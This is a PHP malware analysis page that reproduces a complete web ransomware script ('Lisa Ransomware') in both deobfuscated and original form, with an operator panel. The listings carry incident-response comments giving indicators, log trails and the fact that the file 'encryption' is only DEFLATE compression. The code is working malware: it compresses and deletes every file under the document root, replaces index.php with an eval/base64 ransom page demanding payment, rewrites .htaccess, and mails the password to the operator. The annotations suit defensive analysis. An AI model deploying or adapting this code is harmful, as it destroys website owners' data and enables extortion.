PHP Malware Analysis


Filename: ransom50$.php

Tags

Encoding
  • base64_decode
  • base64_encode
URLs
Emails
  • mymail@gmail.com
Title
  • Ransomware
Execution
  • eval
Input
  • _POST
Environment
  • set_time_limit
  • error_reporting
Files
  • file_get_contents
  • file_put_contents
  • copy

Deobfuscated code

<!-- Created By : Lisa -->
<!-- JapanSec - SkullXploit - OtakuXploiter - OtakuCyberTeam -->
<!-- © 2019 -->
<!-- Downloaded From: https://shell.prinsh.com -->

<head>
<meta charset='utf-8'/>
<meta content='IE=edge' http-equiv='X-UA-Compatible'/>
<meta name="theme-color"content="black">
<meta name="description"content="Ransomware">
<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTHiFHseXDz3LwKUGbgiWkKq0Aqrtk0X6a1Vw&usqp=CAU">
        
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
body { 	 
display: flex;
  align-items: center;
  justify-content: center;
  min-height: 100vh;
background-image: url("https://i.pinimg.com/originals/1e/e2/d9/1ee2d95ac0d53cd78fd004984993dfeb.gif");
color:pink;
    height:100%;
    background-position: center;
    background-repeat: no-repeat;
background-size: 100% 100%;
background-attachment:fixed;} 		
:-webkit-full-screen {
 
}
input { 
    background: transparent; 
    color: pink; 
    border: 1px solid green;
    width:cover;
    height:25px;
}
</style>
<?php 
// Runtime setup for the locking run: error reporting is switched off and the
// execution-time and memory limits are lifted, so a walk of the whole document
// root is not cut short. With reporting off, expect little or nothing in the PHP
// error log; web-server access logs (a POST carrying `pass` to this script) are
// the more reliable trail for timeline reconstruction.
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '-1');
if (isset($_POST['pass'])) {
    /**
     * Per-file "lock" step of the sample (analysis notes; the code is kept verbatim).
     *
     * What the visible code does, in order:
     *  1. Skips any path that contains '.crypt' anywhere (directory names included).
     *  2. Writes gzdeflate(<contents>, 9) to "<path>.crypt" and deletes the original.
     *     No key or cipher is involved: the .crypt file is plain raw DEFLATE, so
     *     gzinflate() on the .crypt contents restores the file without the operator's
     *     password. The embedded decfile() in the ransom page does exactly that.
     *  3. On EVERY call (i.e. once per file), relative to the current working directory:
     *     copies .htaccess to .htabackup, rebuilds the ransom page, overwrites index.php
     *     with it, and overwrites .htaccess.
     *
     * Indicators a responder can look for: files ending in ".crypt", a ".htabackup"
     * file, an index.php that is a single eval/base64_decode line, and an .htaccess
     * holding only DirectoryIndex/ErrorDocument lines pointing at index.php.
     *
     * @param string $filename Path handed over by encdir() ("<dir>/<entry>").
     * @return void
     */
    function encfile($filename)
    {
        // Substring match, not a suffix match: anything under a path containing
        // '.crypt' is left untouched.
        if (strpos($filename, '.crypt') !== false) {
            return;
        }
        // Compression only. None of the return values are checked before the
        // original is unlinked, so a failed read or write is not detected here.
        file_put_contents($filename . ".crypt", gzdeflate(file_get_contents($filename), 9));
        unlink($filename);
        // Runs once per file: from the second file onward the .htaccess being copied
        // is the one this function wrote on the previous call, so .htabackup should
        // not be assumed to hold the site's original rules. Restore from a known-good
        // backup instead.
        copy('.htaccess', '.htabackup');
        // Ransom-page template. It is a runtime string and is reproduced unchanged.
        // Placeholders substituted below: 'gomen' (password hash), 'mymail@gmail.com'
        // (contact address) and '$3' (price). The template's own restore step reads
        // 'htabackup' without the leading dot, so the attacker-supplied decryptor
        // should not be relied on to put .htaccess back.
        $file = "<title>Ransomware</title>\n<!-- Created By : Lisa -->\n<!-- JapanSec - SkullXploit - OtakuXploiter - OtakuCyberTeam -->\n<!-- \xc2\xa9 2019 -->\n\n     <meta charset='utf-8'/>\n<meta content='IE=edge' http-equiv='X-UA-Compatible'/>\n<meta name=\"theme-color\"content=\"black\">\n<meta name=\"description\"content=\"hacked by \">\n<script src=\"https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js\" type=\"text/javascript\"></script>\n        <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\" />\n        <meta property=\"og:image\" content=\"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTHiFHseXDz3LwKUGbgiWkKq0Aqrtk0X6a1Vw&usqp=CAU\">\n        \n<link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css\">\n<style>\nbody { \t \ndisplay: flex;\n  align-items: center;\n  justify-content: center;\n  min-height: 100vh;\nbackground-image: url(\"https://i.pinimg.com/originals/1e/e2/d9/1ee2d95ac0d53cd78fd004984993dfeb.gif\");\ncolor:pink;\n    height:100%;\n    background-position: center;\n    background-repeat: no-repeat;\nbackground-size: 100% 100%;\nbackground-attachment:fixed;} \t\nbtnn{\nalign-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\n}\n</style>\n<font color=\"pink\">\n<?php\nerror_reporting(0);\n\$input = \$_POST['pass'];\n\$pass = \"gomen\";\nif(isset(\$input)) {\nif(md5(\$input) == \$pass) {\nfunction decfile(\$filename){\n\tif (strpos(\$filename, '.crypt') === FALSE) {\n\treturn;\n\t}\n\t\$decrypted = gzinflate(file_get_contents(\$filename));\n\tfile_put_contents(str_replace('.crypt', '', \$filename), \$decrypted);\n\tunlink('crypt.php');\n\tunlink('.htaccess');\n\tunlink(\$filename);\n\techo \"\$filename 
Decrypted !!!<br>\";\n}\n\nfunction decdir(\$dir){\n\t\$files = array_diff(scandir(\$dir), array('.', '..'));\n\t\tforeach(\$files as \$file) {\n\t\t\tif(is_dir(\$dir.\"/\".\$file)){\n\t\t\t\tdecdir(\$dir.\"/\".\$file);\n\t\t\t}else {\n\t\t\t\tdecfile(\$dir.\"/\".\$file);\n\t\t}\n\t}\n}\n\ndecdir(\$_SERVER['DOCUMENT_ROOT']);\necho \"<br>Webroot Decrypted<br>\";\nunlink(\$_SERVER['PHP_SELF']);\nunlink('.htaccess');\ncopy('htabackup','.htaccess');\necho 'Success !!!';\n} else {\necho 'Failed Password !!!';\n}\nexit();\n}\n?>\n<center>\n<h1>Ransomware</h1>\n<br><br>\n<h3>Your Website Is Encrypted</h3>\n\n\nDon't Change the Filename because it Can Damage the File If You Want to Return You Must Enter the Password First\n<br>\nSend Me \$3 For Back Your Website <br><br>\n<br><br>\n<form enctype=\"multipart/form-data\" method=\"post\">\n<!-- Created By : Lisa -->\n<!-- JapanSec - SkullXploit - OtakuXploiter - OtakuCyberTeam -->\n<!-- \xc2\xa9 2019 -->\n\n    <br>\n<input style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: cover;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"text\" name=\"pass\" placeholder=\"Password\">\n<br>\n<input style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"submit\" value=\"Decrypt\">\n    <br>\n       <center>\n<!-- Created By : Lisa -->\n<!-- JapanSec - SkullXploit - OtakuXploiter - OtakuCyberTeam -->\n<!-- \xc2\xa9 2019 -->\n\n<br>\n<audio id=\"myAudio\" loop=\"1\">\n            <source src=\"\nhttps://nathanprinsley-files.prinsh.com/data-1/mp3/everything-i-need_skylar-grey.mp3\" type=\"audio/ogg\">\n            
<source src=\"\nhttps://nathanprinsley-files.prinsh.com/data-1/mp3/everything-i-need_skylar-grey.mp3\" type=\"audio/mpeg\">\n        </audio>\n        <button onclick=\"playAudio()\" style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"button\">Play</button>       <button onclick=\"pauseAudio()\" style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"button\">Pause</button></center>\n        <script>\n              var x = document.getElementById(\"myAudio\"); \n\n              function playAudio() { \n                  x.play(); \n              } \n\n               function pauseAudio() { \n                  x.pause(); \n              } \n        </script>\n</form>\n<br>Contact Mail : mymail@gmail.com\n</font>\n<!-- Created By : Lisa -->\n<!-- JapanSec - SkullXploit - OtakuXploiter - OtakuCyberTeam -->\n<!-- \xc2\xa9 2019 -->";
        // The dropped page carries md5(password), never the password itself.
        $q = str_replace('gomen', md5($_POST['pass']), $file);
        // Request values are substituted into the page without any escaping.
        $w = str_replace('mymail@gmail.com', $_POST['email'], $q);
        // 'hello' does not occur in the template above and the operator form has no
        // `btc` field, so this substitution changes nothing in this sample.
        $e = str_replace('hello', $_POST['btc'], $w);
        $r = str_replace('$3', '$' . $_POST['price'], $e);
        $dec = $r;
        // The finished page is base64-encoded and wrapped in an eval(base64_decode(...))
        // one-liner. For triage: base64-decoding the quoted blob in the dropped
        // index.php yields the ransom page, including the password hash and the
        // contact address entered by the operator.
        $comp = "<?php eval('?>'.base64_decode('" . base64_encode($dec) . "'" . ").'<?php '); ?>";
        $hii = fopen('index.php', 'w');
        fwrite($hii, $comp);
        fclose($hii);
        // Makes index.php the directory index and the 403/404/500 error document, so
        // those requests are answered with the ransom page.
        $hta = "DirectoryIndex index.php\n\r\nErrorDocument 403 /index.php\n\r\nErrorDocument 404 /index.php\n\r\nErrorDocument 500 /index.php\n";
        $ht = fopen('.htaccess', 'w');
        fwrite($ht, $hta);
        fclose($ht);
        echo "{$filename} Encrypted !!!<br>";
    }
    /**
     * Recursive directory walk that feeds every non-directory entry to encfile().
     *
     * The entries of $dir (minus '.' and '..') are visited in scandir() order;
     * directories recurse, everything else is passed to encfile(). The result of
     * scandir() is not checked. For scoping an incident: is_dir() follows symbolic
     * links, so where the tree contains symlinked directories the affected set may
     * reach outside the starting directory. Verify rather than assume the damage is
     * confined to the document root.
     *
     * @param string $dir Directory to walk; the only caller visible here passes
     *                    $_SERVER['DOCUMENT_ROOT'].
     * @return void
     */
    function encdir($dir)
    {
        $files = array_diff(scandir($dir), array('.', '..'));
        foreach ($files as $file) {
            if (is_dir($dir . "/" . $file)) {
                encdir($dir . "/" . $file);
            } else {
                encfile($dir . "/" . $file);
            }
        }
    }
    // Driver for the locking run. This check repeats the enclosing isset() test,
    // so it is always true here.
    if (isset($_POST['pass'])) {
        encdir($_SERVER['DOCUMENT_ROOT']);
    }
    // Places the ransom page at the top of the document root.
    copy('index.php', $_SERVER['DOCUMENT_ROOT'] . '/index.php');
    // No '/' is inserted before '.htaccess' / '.htabackup' in the next two calls.
    // When DOCUMENT_ROOT has no trailing slash the targets are siblings of the
    // document root ("<docroot>.htaccess", "<docroot>.htabackup"), so responders
    // should also check the parent directory for these artefacts.
    copy('.htaccess', $_SERVER['DOCUMENT_ROOT'] . '.htaccess');
    copy($_SERVER['DOCUMENT_ROOT'] . '.htaccess', $_SERVER['DOCUMENT_ROOT'] . '.htabackup');
    // The recipient comes straight from the request. The message carries the host,
    // the request URI and the password in clear text, so MTA logs or a mail spool
    // on the host may hold the operator's address and the password. The fixed
    // subject below is usable as a mail-log search term.
    $to = $_POST['email'];
    $subject = 'Your Ransomware Info';
    $message = "Domain : " . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\n\n" . "Your Password : " . $_POST['pass'];
    if (mail($to, $subject, $message)) {
        echo "The password has been sent to your email";
    } else {
        echo "password was not sent to your email";
    }
    exit;
}
?>
</html>
<?php 
// Setup for the operator panel, reached only when no `pass` field was posted
// (the locking branch above ends in exit). Error display is turned off and the
// time limit lifted; the memory limit is set to 64M here, unlike the locking run.
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
?>
<center>
<h1>Lisa Ransomware</h1>
<br><br><h3>Information :</h3>
Path File : <font color="red"><?php 
// Prints the script's absolute filesystem path to whoever loads the panel.
echo $_SERVER['SCRIPT_FILENAME'];
?></font><br>
Mail Function : <font color="red"><?php 
// Every render of the panel attempts a probe mail with this fixed recipient,
// subject and body. Matching entries in the host's mail log therefore indicate
// when the panel was opened, which is useful when building an incident timeline.
if (mail('mymail@gmail.com', 'tes', 'tes')) {
    echo "ON";
} else {
    echo "OFF";
}
?></font>
<br><br>
    <center>
<form enctype="multipart/form-data" method="post">
    <br>
<input type="text" name="pass" placeholder="Input Password" >
<br>
<input type="text" name="email" placeholder="Your Email" >
<br>
<input type="text" name="price" placeholder="Price Decrypt" >
<br><br>
<input type="submit" class="input" value="Lock Site">
<br>
</form>
</center>
<!--Copyright © 2019--> 
<!-- Downloaded From: https://shell.prinsh.com -->


Original code

<!-- Created By : Lisa -->
<!-- JapanSec - SkullXploit - OtakuXploiter - OtakuCyberTeam -->
<!-- © 2019 -->
<!-- Downloaded From: https://shell.prinsh.com -->

<head>
<meta charset='utf-8'/>
<meta content='IE=edge' http-equiv='X-UA-Compatible'/>
<meta name="theme-color"content="black">
<meta name="description"content="Ransomware">
<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTHiFHseXDz3LwKUGbgiWkKq0Aqrtk0X6a1Vw&usqp=CAU">
        
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
body { 	 
display: flex;
  align-items: center;
  justify-content: center;
  min-height: 100vh;
background-image: url("https://i.pinimg.com/originals/1e/e2/d9/1ee2d95ac0d53cd78fd004984993dfeb.gif");
color:pink;
    height:100%;
    background-position: center;
    background-repeat: no-repeat;
background-size: 100% 100%;
background-attachment:fixed;} 		
:-webkit-full-screen {
 
}
input { 
    background: transparent; 
    color: pink; 
    border: 1px solid green;
    width:cover;
    height:25px;
}
</style>
<?php
// Runtime setup for the locking run: error reporting is switched off and the
// execution-time and memory limits are lifted. With reporting off, expect little
// or nothing in the PHP error log; web-server access logs (a POST carrying `pass`
// to this script) are the more reliable trail.
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '-1');
if(isset($_POST['pass'])) {
/**
 * Per-file "lock" step of the sample as originally shipped (code kept verbatim).
 *
 * Skips paths containing '.crypt', writes gzdeflate(<contents>, 9) to
 * "<path>.crypt" and deletes the original. No key or cipher is used: the output is
 * plain raw DEFLATE, so gzinflate() restores a file without the operator's password.
 * The rest of the body runs once per file and, relative to the current working
 * directory, copies .htaccess to .htabackup, rebuilds the ransom page, and
 * overwrites index.php and .htaccess.
 *
 * Indicators: "*.crypt" files, a ".htabackup" file, an index.php consisting of a
 * single eval/base64_decode line, and an .htaccess holding only
 * DirectoryIndex/ErrorDocument lines pointing at index.php.
 *
 * @param string $filename Path handed over by encdir() ("<dir>/<entry>").
 * @return void
 */
function encfile($filename){
	// Substring match, not a suffix match.
	if (strpos($filename, '.crypt') !== false) {
    return;
	}
	// Compression only; no return value is checked before the original is unlinked.
	file_put_contents($filename.".crypt", gzdeflate(file_get_contents($filename), 9));
	unlink($filename);
// From the second file onward this copies the .htaccess written further down on the
// previous call, so .htabackup should not be assumed to hold the site's original rules.
copy('.htaccess','.htabackup');
// Ransom-page template, shipped base64-encoded. The blob is elided on this page;
// the decoded text appears in the "Deobfuscated code" listing.
$file = base64_decode("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");
// The dropped page carries md5(password), never the password itself.
$q = str_replace('gomen', md5($_POST['pass']), $file);
// Request values are substituted into the page without any escaping.
$w = str_replace('mymail@gmail.com', $_POST['email'], $q);
// The operator form has no `btc` field; whether 'hello' occurs in the template
// cannot be read from the elided blob on this line.
$e = str_replace('hello', $_POST['btc'], $w);
$r = str_replace('$3', '$'.$_POST['price'], $e);
$dec = $r;
// The page is re-encoded and wrapped in an eval(base64_decode(...)) one-liner.
// Base64-decoding the quoted blob in the dropped index.php recovers the ransom page.
$comp = "<?php eval('?>'.base64_decode("."'".base64_encode($dec)."'".").'<?php '); ?>";
$hii = fopen('index.php', 'w');
fwrite($hii, $comp);
fclose($hii);
// Makes index.php the directory index and the 403/404/500 error document.
$hta = "DirectoryIndex index.php\n
ErrorDocument 403 /index.php\n
ErrorDocument 404 /index.php\n
ErrorDocument 500 /index.php\n";
$ht = fopen('.htaccess', 'w');
fwrite($ht, $hta);
fclose($ht);
echo "$filename Encrypted !!!<br>";
}

/**
 * Recursive directory walk that feeds every non-directory entry to encfile().
 *
 * Entries of $dir other than '.' and '..' are visited; directories recurse and
 * everything else goes to encfile(). The result of scandir() is not checked.
 * is_dir() follows symbolic links, so when scoping an incident do not assume the
 * affected files are confined to the starting directory.
 *
 * @param string $dir Directory to walk; the only caller visible here passes
 *                    $_SERVER['DOCUMENT_ROOT'].
 * @return void
 */
function encdir($dir){
	$files = array_diff(scandir($dir), array('.', '..'));
		foreach($files as $file) {
			if(is_dir($dir."/".$file)){
				encdir($dir."/".$file);
			} else {
				encfile($dir."/".$file);
				
		}
	}
}

// Driver for the locking run. This check repeats the enclosing isset() test, so it
// is always true here.
if(isset($_POST['pass'])){
	encdir($_SERVER['DOCUMENT_ROOT']);
}
// Places the ransom page at the top of the document root.
copy('index.php', $_SERVER['DOCUMENT_ROOT'].'/index.php');
// No '/' is inserted before '.htaccess' / '.htabackup' in the next two calls. When
// DOCUMENT_ROOT has no trailing slash the targets are siblings of the document root
// ("<docroot>.htaccess", "<docroot>.htabackup"); check the parent directory too.
copy('.htaccess', $_SERVER['DOCUMENT_ROOT'].'.htaccess');
copy($_SERVER['DOCUMENT_ROOT'].'.htaccess', $_SERVER['DOCUMENT_ROOT'].'.htabackup');
// The recipient comes straight from the request. The message carries the host, the
// request URI and the password in clear text, so MTA logs or a mail spool on the
// host may hold them. The fixed subject is usable as a mail-log search term.
$to = $_POST['email'];
$subject = 'Your Ransomware Info';
$message = "Domain : ".$_SERVER['SERVER_NAME'] .$_SERVER['REQUEST_URI']."\n\n"."Your Password : ".$_POST['pass'];
if(mail($to,$subject,$message)) {
echo 'The password has been sent to your email';
} else {
echo 'password was not sent to your email';
}
exit();
}
?>
</html>
<?php 
// Setup for the operator panel, reached only when no `pass` field was posted (the
// locking branch above ends in exit): error display off, no time limit, 64M memory.
@ini_set('output_buffering', 0); @ini_set('display_errors', 0); set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type: text/html; charset=UTF-8');


?>
<center>
<h1>Lisa Ransomware</h1>
<br><br><h3>Information :</h3>
Path File : <font color="red"><?php echo $_SERVER['SCRIPT_FILENAME'] ; ?></font><br>
Mail Function : <font color="red"><?php if(mail('mymail@gmail.com','tes','tes')) { echo "ON"; } else { echo "OFF"; } ?></font>
<br><br>
    <center>
<form enctype="multipart/form-data" method="post">
    <br>
<input type="text" name="pass" placeholder="Input Password" >
<br>
<input type="text" name="email" placeholder="Your Email" >
<br>
<input type="text" name="price" placeholder="Price Decrypt" >
<br><br>
<input type="submit" class="input" value="Lock Site">
<br>
</form>
</center>
<!--Copyright © 2019--> 
<!-- Downloaded From: https://shell.prinsh.com -->